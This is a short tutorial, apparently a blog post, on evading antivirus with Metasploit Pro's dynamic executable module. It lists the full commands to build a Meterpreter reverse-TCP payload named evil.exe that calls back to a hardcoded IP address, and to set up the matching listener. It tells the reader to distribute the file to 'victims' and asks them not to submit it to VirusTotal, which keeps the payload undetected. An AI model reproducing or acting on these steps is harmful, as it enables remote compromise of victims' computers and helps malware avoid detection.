[UPDATE] AV Evasion With Metasploit Pro's Dynamic Executable Option

A while back, I posted a tutorial about basic antivirus evasion with Metasploit but the methods I described had a very high rate of detection. I figured it was since Metasploit’s payloads are so well know that AV vendors have been able to get signatures for a large majority of the payloads that have been encoded, packed, etc, rendering them virtually unusable.

Now, if your work buys you toys like mine does it is possible that you have access to Metasploit Pro (the paid version of Metasploit). It comes with a few cool gadgets like a web interface that allows you to manage “campaigns” as well as a few added exploits and payloads. However, we are specifically interested in one option: exploit/pro/windows/dynamic_exe

Start by firing up the MSP console

msfpro

Then use the exploit/pro/windows/dynamic_exe option

use exploit/pro/windows/dynamic_exe

Then set the payload you want to use. I’ll use a Meterpreter reverse TCP for simplicity sake.

set PAYLOAD windows/meterpreter/reverse_tcp

Then set the options for the dynamic executable template

set FILENAME evil.exe
set SERVICE false

These options set the file name to evil.exe and makes sure that the new executable is not a service EXE (haven’t had much luck with that.)

Finally, set your standard Meterpreter options

set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit

Once you tell it to exploit, MSP will drop the executable under your home directory (/root/.msf4/local/evil.exe on a default Kali install)

Now that you have a file to distribute to your victims, set up a simple MSP/F listener with the same details you set when building the exe.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 174.143.236.106
set LPORT 4443
set ExitOnSession false
exploit -j (I suggest running this as a job as there may be slow turnaround)

All that is left to do is to distribute that evil.exe file to your victims and wait for someone to click it. Once it is opened, you will see a standard Meterpreter session opened on your listening box.

A quick note, PLEASE DO NOT SUBMIT WHATEVER PAYLOAD, EXECUTABLE, ETC YOU CREATE TO VIRUSTOTAL!